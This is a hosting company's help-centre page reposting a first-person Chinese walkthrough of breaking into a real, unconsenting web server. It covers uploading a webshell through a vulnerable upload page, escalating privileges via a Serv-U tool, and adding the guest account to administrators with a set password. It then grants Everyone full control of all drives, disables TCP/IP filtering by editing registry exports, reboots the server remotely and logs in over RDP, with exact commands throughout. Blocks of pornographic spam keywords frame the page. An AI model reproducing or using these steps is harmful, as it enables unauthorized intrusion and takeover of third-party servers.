精品日韩在线,日韩精品福利一区二区三区,日韩午夜黄色,国产日韩欧美高清免费

始創(chuàng)于2000年 股票代碼:831685
咨詢熱線:0371-60135900 注冊有禮 登錄
  • 掛牌上市企業(yè)
  • 60秒人工響應(yīng)
  • 99.99%連通率
  • 7*24h人工
  • 故障100倍補(bǔ)償
全部產(chǎn)品
您的位置: 網(wǎng)站首頁 > 幫助中心>文章內(nèi)容

從上傳webshell到突破TCP/IP篩選到3389終端登陸

發(fā)布時間:  2012/6/21 18:08:09

一:得到webshell
今天晚上的一次小小測試,由于本人太菜,再高深的技術(shù)我也不會,只能這樣了..........
一切都已經(jīng)過去了,沒有辦法補(bǔ)圖了,希望能看的懂這個小帖子。
今天有是無聊的一天,晚上實在無聊沒有事情干,就到一個視頻聊天站點看秀,嘿嘿~
突然發(fā)現(xiàn)一個聊天室特別的火暴,人數(shù)已經(jīng)有500人在里面了(滿員了),刷了n次也沒有進(jìn)去..........更加郁悶了。海
想想反正也是沒有事情做,測試一下主機(jī)安全做的怎么樣吧,呵呵(太菜,說測試人家安全實在是抬高自己了)
在cmd下ping了一下得到了對方的ip,然后登陸http://whois.webhosting.info/對方ip看看有沒有其他的站點,哈,這下發(fā)了,上面有幾十個站點,估計我還是能找到一個兩個帶漏洞的站點的`
經(jīng)過漫長的查找,終于找到一個動易帶漏洞的頁面http://www.xxxx.net/Upfile_Soft.asp,上傳一個webshell(海陽2005正式版)先(怎么上傳我就不羅嗦了,上傳工具現(xiàn)在漫天飄了)。

二:成功提升權(quán)限建立用戶
拿到webshell后高高興興的登陸了,突然發(fā)現(xiàn)什么權(quán)限都沒有,只能在自己的webshell所在的目錄里面打轉(zhuǎn)(c.d.e.f盤都瀏覽不了),連刪除文件的權(quán)限都沒有,郁悶呀........
回到〖Server〗下看看主機(jī)開了什么服務(wù)吧,經(jīng)過發(fā)現(xiàn)他開了終端服務(wù)和serv-u服務(wù),哈,這下有搞頭了^_^用superscan掃描了一下他的ip,果然通過banner看出他是用的serv-u,版本5.0。
到〖Wscript.Shell〗下面試試看能執(zhí)行cmd命令不能,輸入net user后沒有反映,再試通過Wscript.Shell能執(zhí)行cmd命令不能,再次輸入net user后執(zhí)行返回了對方的user名單,哈哈,這下好了,能拿下了!!
上傳serv-u提升工具到D:\a004\tggtwe\****.com\UploadSoft目錄下面,改名為:test.exe,然后回到〖Wscript.Shell〗下執(zhí)行命令去了,嘿嘿,馬上一只肥雞就要到手了,高興ing~
通過Wscript.Shell執(zhí)行cmd命令:
D:\a004\tggtwe\****.com\UploadSoft\test.exe "net user guest /active:yes" #激活guest賬號,我喜歡用這個賬號
D:\a004\tggtwe\****.com\UploadSoft\test.exe "net user guest lvhuana" #把guest賬號的密碼設(shè)定為lvhuana
D:\a004\tggtwe\****.com\UploadSoft\test.exe "net localgroup administrators guest /add" #提升guest權(quán)限到admin權(quán)限
好了,賬號建立完畢,執(zhí)行一下net localgroup administrators看看成功沒,通過回顯知道添加成功了。然后執(zhí)行netstat -an后看到他開的終端端口是默認(rèn)的3389,OK,連接試試~

三:解決TCP/IP篩選
連接不上?暈...........再拿出superscan來掃一下他的3389,根本掃不到........(開了防火墻?靠,我的點真背.....)
沒有辦法了,再次回到Wscript.Shell執(zhí)行cmd命令:
D:\a004\tggtwe\****.com\UploadSoft\test.exe "cacls.exe c: /e /t /g everyone:F" #把c盤設(shè)置為everyone可以瀏覽
D:\a004\tggtwe\****.com\UploadSoft\test.exe "cacls.exe d: /e /t /g everyone:F" #把d盤設(shè)置為everyone可以瀏覽
D:\a004\tggtwe\****.com\UploadSoft\test.exe "cacls.exe e: /e /t /g everyone:F" #把e盤設(shè)置為everyone可以瀏覽
D:\a004\tggtwe\****.com\UploadSoft\test.exe "cacls.exe f: /e /t /g everyone:F" #把f盤設(shè)置為everyone可以瀏覽
這下最少可以遍歷整個硬盤了,我在硬盤里面到處的翻,找遍了也沒有找到他的防火墻文件,這下心里有數(shù)了,肯定是他進(jìn)行TCP/IP篩選了。ó(dāng)然也有是內(nèi)網(wǎng)做服務(wù)器的可能,具體大家自己可以根據(jù)ipconfig -all來判斷)
突破TCP/IP篩選我們可以更改他的注冊表來實現(xiàn),我們要做的就是導(dǎo)出他注冊表的三處,更改后再導(dǎo)入就可以了,回到〖Wscript.Shell〗執(zhí)行cmd命令:
D:\a004\tggtwe\****.com\UploadSoft\test.exe "regedit -e D:\a004\tggtwe\****.com\UploadSoft\1.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip" #導(dǎo)出注冊表里關(guān)于TCP/IP篩選的第一處
D:\a004\tggtwe\****.com\UploadSoft\test.exe "regedit -e D:\a004\tggtwe\****.com\UploadSoft\2.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip" #導(dǎo)出注冊表里關(guān)于TCP/IP篩選的第二處
D:\a004\tggtwe\****.com\UploadSoft\test.exe "regedit -e D:\a004\tggtwe\****.com\UploadSoft\3.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip" #導(dǎo)出注冊表里關(guān)于TCP/IP篩選的第三處
然后回到〖Stream〗或〖FSO〗發(fā)現(xiàn)1.reg,2.reg,3.reg已經(jīng)安靜的躺在那里了,嘿嘿~
把1.reg,2.reg,3.reg下載回來到自己的硬盤里面編輯一下,把關(guān)于TCP/IP篩選的幾個地方改一下,首先打開1.reg找到"EnableSecurityFilters"=dword:00000001把最后面的數(shù)字1改成0后保存,然后更改2.reg,3.reg,更改方法一樣,我就不再羅嗦了~
然后我們把1.reg,2.reg,3.reg再上傳回對方的機(jī)器里面(這里我們要選上覆蓋模式,因為沒有權(quán)限刪除原來的1.reg,2.reg,3.reg),上傳成功后再回到〖Wscript.Shell〗執(zhí)行cmd命令:
D:\a004\tggtwe\****.com\UploadSoft\test.exe "regedit -s D:\a004\tggtwe\****.com\UploadSoft\1.reg" #安靜模式下把我們修改完的1.reg導(dǎo)入到他的注冊表
D:\a004\tggtwe\****.com\UploadSoft\test.exe "regedit -s D:\a004\tggtwe\****.com\UploadSoft\2.reg" #安靜模式下把我們修改完的2.reg導(dǎo)入到他的注冊表
D:\a004\tggtwe\****.com\UploadSoft\test.exe "regedit -s D:\a004\tggtwe\****.com\UploadSoft\3.reg" #安靜模式下把我們修改完的3.reg導(dǎo)入到他的注冊表
OK!導(dǎo)入后重新啟動他的機(jī)器后在能解決TCP/IP篩選問題,再在〖Wscript.Shell〗執(zhí)行cmd命令:
D:\a004\tggtwe\****.com\UploadSoft\test.exe "iisreset /reboot /timeout:00" #利用他自身的iis服務(wù)來重新啟動他的機(jī)器,/timeout:00這個參數(shù)是讓他立即重新啟動
執(zhí)行完后我們再用superscan已經(jīng)掃不到他了,吼吼~已經(jīng)重新啟動了!

四:成功用終端登陸
經(jīng)過漫長的等待后(其實時間不長,只是我在這里已經(jīng)等不及了,嘿嘿~),終于可以用superscan掃到他了,并且可以掃到他的3389端口了,哈哈,終于成功了,拿出終端登陸器順利的用我剛才建立的user:guest,pass:lvhuana登陸上了!
好了,這篇垃圾文章到此就該結(jié)束了,已經(jīng)凌晨了,也該收工睡覺了~由于本人太菜,錯誤地方肯定在所難免,讓大家見笑了,同時望大家指正!


億恩科技地址(ADD):鄭州市黃河路129號天一大廈608室 郵編(ZIP):450008 傳真(FAX):0371-60123888
   聯(lián)系:億恩小凡
   QQ:89317007
   電話:0371-63322206


本文出自:億恩科技【www.zuiquanben.com】

服務(wù)器租用/服務(wù)器托管中國五強(qiáng)!虛擬主機(jī)域名注冊頂級提供商!15年品質(zhì)保障!--億恩科技[ENKJ.COM]

  • 您可能在找
  • 億恩北京公司:
  • 經(jīng)營性ICP/ISP證:京B2-20150015
  • 億恩鄭州公司:
  • 經(jīng)營性ICP/ISP/IDC證:豫B1-20183354
  • 億恩南昌公司:
  • 經(jīng)營性ICP/ISP證:贛B2-20080012
  • 服務(wù)器/云主機(jī) 24小時售后服務(wù)電話:0371-60135900
  • 虛擬主機(jī)/智能建站 24小時售后服務(wù)電話:0371-60135900
  • 網(wǎng)絡(luò)版權(quán)侵權(quán)舉報電話:0371-60135995
  • 警情提示:注意防范電信網(wǎng)絡(luò)詐騙
  • 專注服務(wù)器托管17年
    掃掃關(guān)注-微信公眾號
    0371-60135900
    Copyright© 1999-2026 ENKJ All Rights Reserved 地址:鄭州市高新區(qū)翠竹街1號總部企業(yè)基地億恩大廈  法律顧問:河南亞太人律師事務(wù)所郝建鋒、杜慧月律師  B1-20183354   京公網(wǎng)安備41019702002023號 
      0
     
     
     
     

    0371-60135900
    7*24小時客服服務(wù)熱線

     
     
    精品日韩在线,日韩精品福利一区二区三区,日韩午夜黄色,国产日韩欧美高清免费
    日韩欧美中文字幕在线视频| 日本va欧美va瓶| 日本不卡不码高清免费观看 | 久久国产精品久久w女人spa| 国产videos久久| 久久国产人妖系列| 日欧美一区二区| 在线免费观看亚洲| 美女国产一区| 中文字幕一区二区精品区| 美女精品在线| 免费观看不卡av| 影视先锋久久| jiujiure精品视频播放| 欧美成人午夜| 日韩视频一区| 亚洲中午字幕| 亚洲免费毛片| 欧美视频一区| 国产精品一区二区99| 欧美日韩一区二区高清| 欧美日韩亚洲一区在线观看| 欧美日韩亚洲一区| 欧美成人精品午夜一区二区| 老司机精品在线| 久久国产中文字幕| 久久一区二区三区电影| 伊人精品在线| 亚洲精品伊人| 国产精品777777在线播放| 成人日韩av| 视频一区视频二区中文字幕| 欧美日韩1区| bbw在线视频| 另类小说一区二区三区| 国产精品日韩精品中文字幕| 最新亚洲激情| 国产精品一线天粉嫩av| 女人av一区| 欧美影院视频| 久久麻豆精品| 日本在线一区二区三区| 国产一区二区三区亚洲| 图片区亚洲欧美小说区| 国产乱子精品一区二区在线观看 | 欧美日韩国产在线一区| 久久丁香四色| 在线日韩成人| 亚洲少妇在线| 日韩精品欧美| 久久精品国产福利| 日本不卡视频一二三区| 亚洲精品高潮| 国产欧美在线| 国产日韩一区二区三免费高清 | 99精品视频在线观看免费播放| 精品一区视频| 国产福利资源一区| 亚洲毛片视频| 免费视频久久| 日韩电影在线视频| 日本不卡的三区四区五区| 欧美91精品| 久久精品观看| 日韩av自拍| 激情久久一区二区| 欧美欧美黄在线二区| 久久国产直播| 久久久一二三| xxxxx性欧美特大| 午夜精品影视国产一区在线麻豆| 欧美1级日本1级| 神马日本精品| 日韩中文在线电影| 成人亚洲一区| 久久精品免视看国产成人| 日韩精品三区四区| 综合激情五月婷婷| 免费久久99精品国产自在现线| 99精品视频精品精品视频| 成人一区而且| 蜜臀久久精品| 国内精品伊人| 国产精品一区二区三区www| 欧美日韩国产欧| 日韩视频在线一区二区三区 | 国产亚洲精品久久久久婷婷瑜伽| 三上亚洲一区二区| 国产在线观看www| 欧美国产中文高清| 九九久久国产| 久久九九99| 免费成人在线影院| 在线免费观看亚洲| 国产精品久久久久久久久久妞妞 | 日韩在线第七页| 老牛国内精品亚洲成av人片| 日韩精品不卡一区二区| 国产91欧美| 模特精品在线| 国产精品17p| 亚洲丝袜啪啪| 最新中文字幕在线播放| 国产亚洲欧美日韩在线观看一区二区| 日本精品另类| 日本少妇一区| 久久国产乱子精品免费女| 国产一区二区三区四区五区 | 国产精品白浆| 免费视频国产一区| 久久不射中文字幕| 精品黄色一级片| 蜜桃91丨九色丨蝌蚪91桃色| 欧美精品高清| 麻豆精品av| 日韩一区中文| 婷婷综合激情| 7m精品国产导航在线| 久久久777| 欧美综合二区| 久久精品天堂| 日本不卡高清视频| 99精品美女| 久久97视频| 婷婷视频一区二区三区| 国产欧美日韩在线一区二区| 欧美日韩尤物久久| 欧美一区二区三区免费看| 欧洲一级精品| 久久精品国产网站| 青草综合视频| 老牛影视一区二区三区| 成人午夜国产| 精品淫伦v久久水蜜桃| 免播放器亚洲一区| 亚洲一级高清| 国产精品久久久久久av公交车| 日韩高清在线不卡| 亚洲激情av| 亚洲女同一区| 9999国产精品| 国产精品调教视频| 亚洲精品系列| 亚洲精品九九| 在线观看亚洲精品福利片| 免费国产自久久久久三四区久久| 不卡福利视频| 成人在线视频区| 久久久久午夜电影| 欧美~级网站不卡| 免费欧美一区| 国产精品日韩久久久| 好吊日精品视频| 蜜臀久久99精品久久一区二区 | 亚洲国产成人精品女人| 午夜av不卡| 欧美成人基地 | 国产精品nxnn| 国产精品色在线网站| 日韩福利在线观看| 青草综合视频| 国产精品日本一区二区三区在线 | 国产成人免费视频网站视频社区| 亚州精品视频| 日韩一区二区三区免费视频 | 日韩专区欧美专区| 亚洲伊人精品酒店| 日本不卡视频在线| 狂野欧美性猛交xxxx| 日本精品在线中文字幕| 国产综合视频| 国产精品最新| 久久久久久色 | 亚洲欧洲美洲av| 精品一区欧美| 青草久久视频| 欧美国产先锋| 日韩电影免费在线观看| 99免费精品| 午夜亚洲一区| 免费在线成人| 亚洲国产成人精品女人| 国产精品久久久久久久久久久久久久久 | 日韩中文字幕1| 免费看久久久| 黄在线观看免费网站ktv| 国产精品日韩| 久久99精品久久久久久园产越南| 欧美男人天堂| 欧美一区激情| 午夜精品影院| 国产精品调教视频| 99成人在线| 久久免费精品| 久久午夜精品| 成人看片网站| 成人午夜网址| 日韩激情中文字幕| 一区在线免费| 精品日韩视频|